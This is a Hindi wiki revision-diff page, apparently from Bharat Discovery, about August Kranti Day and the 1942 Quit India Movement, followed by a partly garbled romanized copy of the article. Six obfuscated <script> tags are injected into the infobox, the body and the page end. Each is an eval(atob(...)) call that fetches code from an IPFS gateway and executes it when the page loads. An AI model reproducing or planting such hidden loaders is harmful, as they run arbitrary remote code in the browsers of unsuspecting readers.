Difference between revisions of "भारतीय क्रांति दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[quality revision][pending revision]
 
Line 2: Line 2:
 
|चित्र=Gowalia tank.jpg
 
|चित्र=Gowalia tank.jpg
 
|चित्र का नाम=गोवालिया टैंक मैदान
 
|चित्र का नाम=गोवालिया टैंक मैदान
|विवरण= [[9 अगस्त]], सन् [[1942]] ई. में [[भारत छोड़ो आंदोलन]] की शुरुआत हुई थी इसीलिए 9 अगस्त के दिन को इतिहास में 'अगस्त क्रांति दिवस' के रूप में जाना जाता है।  
+
|विवरण= [[9 अगस्त]], सन् [[1942]] ई. में [[भारत छोड़ो आंदोलन]] की शुरुआत हुई थी इसीलिए [[9 अगस्त]] के दिन को [[इतिहास]] में 'अगस्त क्रांति दिवस' के रूप में जाना जाता है।  
 
|शीर्षक 1=स्थान
 
|शीर्षक 1=स्थान
 
|पाठ 1=[[अगस्त क्रांति मैदान]]
 
|पाठ 1=[[अगस्त क्रांति मैदान]]
Line 28: Line 28:
 
|अद्यतन={{अद्यतन|13:55, 9 अगस्त 2016 (IST)}}
 
|अद्यतन={{अद्यतन|13:55, 9 अगस्त 2016 (IST)}}
 
}}
 
}}
[[भारत]] के [[इतिहास]] में [[9 अगस्त]] के दिन को अगस्त क्रांति दिवस के रूप में जाना जाता है। द्वितीय विश्व युद्ध में समर्थन लेने के बावज़ूद जब [[अंग्रेज़]] भारत को स्वतंत्र करने को तैयार नहीं हुए तो राष्ट्रपिता [[महात्मा गाँधी]] ने [[भारत छोड़ो आंदोलन]] के रूप में आज़ादी की अंतिम जंग का ऐलान कर दिया जिससे ब्रितानिया हुक़ूमत में दहशत फैल गई। [[9 अगस्त]], सन् [[1942]] ई. में इस आंदोलन की शुरुआत हुई थी, इसीलिए 9 अगस्त के दिन को इतिहास में अगस्त क्रांति दिवस के रूप में जाना जाता है। यह आंदोलन [[मुम्बई]] के जिस पार्क से शुरू हुआ उसे अब [[अगस्त क्रांति मैदान]] के नाम से जाना जाता है। [[भारतीय राष्ट्रीय कांग्रेस]] ने अंग्रेज़ों को देश से भगाने के लिए [[4 जुलाई]], सन् 1942 ई. को एक प्रस्ताव पारित किया जिसमें कहा गया कि यदि अंग्रेज़ भारत नहीं छोड़ते हैं तो उनके ख़िलाफ़ व्यापक स्तर पर नागरिक अवज्ञा आंदोलन चलाया जाए। [[चित्र:Mahatma-Gandhi-4.jpg|200px|thumb|[[महात्मा गाँधी]]|left]]   
+
[[भारत]] के [[इतिहास]] में [[9 अगस्त]] के दिन को 'अगस्त क्रांति दिवस' के रूप में जाना जाता है। द्वितीय विश्व युद्ध में समर्थन लेने के बावज़ूद जब [[अंग्रेज़]] भारत को स्वतंत्र करने को तैयार नहीं हुए तो राष्ट्रपिता [[महात्मा गाँधी]] ने [[भारत छोड़ो आंदोलन]] के रूप में आज़ादी की अंतिम जंग का ऐलान कर दिया, जिससे ब्रितानिया हुक़ूमत में दहशत फैल गई। [[9 अगस्त]], सन् [[1942]] में इस आंदोलन की शुरुआत हुई थी, इसीलिए 9 अगस्त के दिन को इतिहास में 'अगस्त क्रांति दिवस' के रूप में जाना जाता है। यह आंदोलन [[मुम्बई]] के जिस पार्क से शुरू हुआ, उसे अब '[[अगस्त क्रांति मैदान]]' के नाम से जाना जाता है। [[भारतीय राष्ट्रीय कांग्रेस]] ने अंग्रेज़ों को देश से भगाने के लिए [[4 जुलाई]], सन् 1942 को एक प्रस्ताव पारित किया, जिसमें कहा गया कि यदि अंग्रेज़ भारत नहीं छोड़ते हैं तो उनके ख़िलाफ़ व्यापक स्तर पर नागरिक अवज्ञा आंदोलन चलाया जाए।[[चित्र:Mahatma-Gandhi-4.jpg|200px|thumb|[[महात्मा गाँधी]]|left]]   
 
==समर्थन==
 
==समर्थन==
 
पार्टी के भीतर इस प्रस्ताव को लेकर मतभेद पैदा हो गए और प्रसिद्ध कांग्रेसी नेता [[चक्रवर्ती राजगोपालाचारी]] ने पार्टी छोड़ दी। [[पंडित जवाहरलाल नेहरू]] और [[मौलाना अबुल कलाम आज़ाद]] प्रस्तावित आंदोलन को लेकर शुरुआत में संशय में थे लेकिन उन्होंने महात्मा गाँधी के आह्वान पर अंत तक इसके समर्थन का फैसला किया। वरिष्ठ गाँधीवादियों और समाजवादियों जैसे [[सरदार पटेल|सरदार वल्लभभाई पटेल]] और [[राजेंद्र प्रसाद|डॉ. राजेंद्र प्रसाद]] यहाँ तक कि [[अशोक मेहता]] और [[जयप्रकाश नारायण]] ने इस तरह के किसी भी आंदोलन का खुलकर समर्थन किया।
 
पार्टी के भीतर इस प्रस्ताव को लेकर मतभेद पैदा हो गए और प्रसिद्ध कांग्रेसी नेता [[चक्रवर्ती राजगोपालाचारी]] ने पार्टी छोड़ दी। [[पंडित जवाहरलाल नेहरू]] और [[मौलाना अबुल कलाम आज़ाद]] प्रस्तावित आंदोलन को लेकर शुरुआत में संशय में थे लेकिन उन्होंने महात्मा गाँधी के आह्वान पर अंत तक इसके समर्थन का फैसला किया। वरिष्ठ गाँधीवादियों और समाजवादियों जैसे [[सरदार पटेल|सरदार वल्लभभाई पटेल]] और [[राजेंद्र प्रसाद|डॉ. राजेंद्र प्रसाद]] यहाँ तक कि [[अशोक मेहता]] और [[जयप्रकाश नारायण]] ने इस तरह के किसी भी आंदोलन का खुलकर समर्थन किया।
Line 41: Line 41:
 
==भूख हड़ताल==
 
==भूख हड़ताल==
 
गाँधीजी का स्वास्थ्य जेल में अत्यधिक बिगड़ गया लेकिन फिर भी उन्होंने अपना आंदोलन जारी रखने के लिए 21 दिन की भूख हड़ताल की। सन् [[1944]] ई. में गाँधीजी का स्वास्थ्य बेहद बिगड़ जाने पर अंग्रेज़ों ने उन्हें रिहा कर दिया। [[1944]] के शुरू तक अंग्रेज़ों ने हालात पर काबू पा लिया जिससे बहुत से राष्ट्रवादी अत्यंत निराश हुए। गाँधीजी और कांग्रेस को [[मुहम्मद अली जिन्ना]], [[मुस्लिम लीग]], वामपंथियों और अन्य विरोधियों की आलोचना का सामना करना पड़ा।<ref>{{cite web |url=http://hindi.webdunia.com/miscellaneous/literature/articles/0908/09/1090809040_1.htm |title=बापू ने किया आज़ादी की अंतिम जंग का शंखनाद |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |last= |first= |authorlink=|format=एच.टी.एम |publisher=वेबदुनिया |language=हि्न्दी}}</ref>
 
गाँधीजी का स्वास्थ्य जेल में अत्यधिक बिगड़ गया लेकिन फिर भी उन्होंने अपना आंदोलन जारी रखने के लिए 21 दिन की भूख हड़ताल की। सन् [[1944]] ई. में गाँधीजी का स्वास्थ्य बेहद बिगड़ जाने पर अंग्रेज़ों ने उन्हें रिहा कर दिया। [[1944]] के शुरू तक अंग्रेज़ों ने हालात पर काबू पा लिया जिससे बहुत से राष्ट्रवादी अत्यंत निराश हुए। गाँधीजी और कांग्रेस को [[मुहम्मद अली जिन्ना]], [[मुस्लिम लीग]], वामपंथियों और अन्य विरोधियों की आलोचना का सामना करना पड़ा।<ref>{{cite web |url=http://hindi.webdunia.com/miscellaneous/literature/articles/0908/09/1090809040_1.htm |title=बापू ने किया आज़ादी की अंतिम जंग का शंखनाद |accessmonthday=[[28 जुलाई]] |accessyear=[[2010]] |last= |first= |authorlink=|format=एच.टी.एम |publisher=वेबदुनिया |language=हि्न्दी}}</ref>
 
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
Line 51: Line 49:
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:राष्ट्रीय पर्व और त्योहार]]
 
[[Category:राष्ट्रीय पर्व और त्योहार]]
[[Category:राष्ट्रीय दिवस]]
+
[[Category:राष्ट्रीय दिवस]][[Category:महत्त्वपूर्ण_दिवस]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__
[[Category:महत्त्वपूर्ण_दिवस]]
 

Latest revision as of 07:12, 9 August 2018

bharatiy kraanti divas
vivaran 9 agast, sanh 1942 ee. mean bharat chho do aandolan ki shuruat huee thi isilie 9 agast ke din ko itihas mean 'agast kraanti divas' ke roop mean jana jata hai.
sthan agast kraanti maidan
pramukh vyakti mahatma gaandhi, chakravarti rajagopalachari, pandit javaharalal neharoo, maulana abul kalam azad, jayaprakash narayan, d aau. rajeandr prasad
any janakari bharatiy rashtriy kaangres ne aangrezoan ko desh se bhagane ke lie 4 julaee, sanh 1942 ee. ko ek prastav parit kiya jisamean kaha gaya ki yadi aangrez bharat nahian chho date haian to unake khilaf vyapak star par nagarik avajna aandolan chalaya jae.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bharat ke itihas mean 9 agast ke din ko 'agast kraanti divas' ke roop mean jana jata hai. dvitiy vishv yuddh mean samarthan lene ke bavazood jab aangrez bharat ko svatantr karane ko taiyar nahian hue to rashtrapita mahatma gaandhi ne bharat chho do aandolan ke roop mean azadi ki aantim jang ka ailan kar diya, jisase britaniya huqoomat mean dahashat phail gee. 9 agast, sanh 1942 mean is aandolan ki shuruat huee thi, isilie 9 agast ke din ko itihas mean 'agast kraanti divas' ke roop mean jana jata hai. yah aandolan mumbee ke jis park se shuroo hua, use ab 'agast kraanti maidan' ke nam se jana jata hai. bharatiy rashtriy kaangres ne aangrezoan ko desh se bhagane ke lie 4 julaee, sanh 1942 ko ek prastav parit kiya, jisamean kaha gaya ki yadi aangrez bharat nahian chho date haian to unake khilaf vyapak star par nagarik avajna aandolan chalaya jae.[[chitr:Mahatma-Gandhi-4.jpg|200px|thumb|mahatma gaandhi|left]]

samarthan

parti ke bhitar is prastav ko lekar matabhed paida ho ge aur prasiddh kaangresi neta chakravarti rajagopalachari ne parti chho d di. pandit javaharalal neharoo aur maulana abul kalam azad prastavit aandolan ko lekar shuruat mean sanshay mean the lekin unhoanne mahatma gaandhi ke ahvan par aant tak isake samarthan ka phaisala kiya. varishth gaandhivadiyoan aur samajavadiyoan jaise saradar vallabhabhaee patel aur d aau. rajeandr prasad yahaan tak ki ashok mehata aur jayaprakash narayan ne is tarah ke kisi bhi aandolan ka khulakar samarthan kiya.

prastav

aandolan ke lie kaangres ko halaanki sabhi daloan ko ek jhande tale lane mean saphalata nahian mili. is ahvan ka muslim lig, bharatiy kamyunist parti aur hindoo mahasabha ne virodh kiya. 8 agast sanh 1942 ee. ko akhil bharatiy kaangres samiti ke bambee satr mean bharat chho do aandolan ka prastav parit kiya gaya.

shankhanad

bharat chho do aandolan ka prastav parit hone ke bare mean britaniya huqoomat pahale se hi satark thi isalie gaandhiji ko agale hi din pune ke aga khan pailes mean qaid kar diya gaya. ahamadanagar qile mean kaangres karyakari samiti ke sabhi karyakartaoan ko giraftar kar band kar diya gaya. lagabhag sabhi neta giraftar kar lie ge lekin yuva netri aruna asaph ali giraftar nahian ki gee aur mumbee ke gavaliya taiank maidan mean unhoanne sanh 1942 ee. ko tiranga phaharakar gaandhiji ke bharat chho do aandolan ka shankhanad kar diya. [[chitr:Sardar-Vallabh-Bhai-Patel.jpg|thumb|right|200px|saradar vallabh bhaee patel]]

svatantr shasan sthapit

gaandhiji ne halaanki ahiansak roop se aandolan chalane ka ahvan kiya tha lekin aangrezoan ko bhagane ka deshavasiyoan mean aisa junoon paida ho gaya ki kee sthanoan par bam visphot hue, sarakari imaratoan ko jala diya gaya, bijali kat di gee tatha parivahan aur sanchar sevaoan ko bhi dhvast kar diya gaya. jagah-jagah par h datal ki gee. logoan ne zila prashasan ko kee jagah par ukha d pheanka. giraftar kie ge netaoan tatha karyakartaoan ko jel to dakar mukt kara liya tatha vahaan svatantr shasan sthapit kar diya. ek to dvitiy vishv yuddh mean aangrezoan ki ridh toot rahi thi doosari or bharat chho do aandolan unaki choolean hilane mean laga tha.

baukhalahat

itihasavetta aur maharshi dayanand vishvavidyalay mean itihas ki poorv prophesar malati malik ke anusar is aandolan se aangrez buri tarah baukhala ge. unhoanne saik doan pradarshanakariyoan aur nirdosh logoan ko goli se u da diya tatha ek lakh se adhik logoan ko deshabhar mean giraftar kar liya gaya. isake bavazood aandolan poore josh ke sath chalata raha lekin giraftariyoan ki vajah se kaangres ka samoocha netritv shesh duniya se lagabhag tin sal tak kata raha.

bhookh h datal

gaandhiji ka svasthy jel mean atyadhik big d gaya lekin phir bhi unhoanne apana aandolan jari rakhane ke lie 21 din ki bhookh h datal ki. sanh 1944 ee. mean gaandhiji ka svasthy behad big d jane par aangrezoan ne unhean riha kar diya. 1944 ke shuroo tak aangrezoan ne halat par kaboo pa liya jisase bahut se rashtravadi atyant nirash hue. gaandhiji aur kaangres ko muhammad ali jinna, muslim lig, vamapanthiyoan aur any virodhiyoan ki alochana ka samana karana p da.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bapoo ne kiya azadi ki aantim jang ka shankhanad (hihndi) (ech.ti.em) vebaduniya. abhigaman tithi: 28 julaee, 2010.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>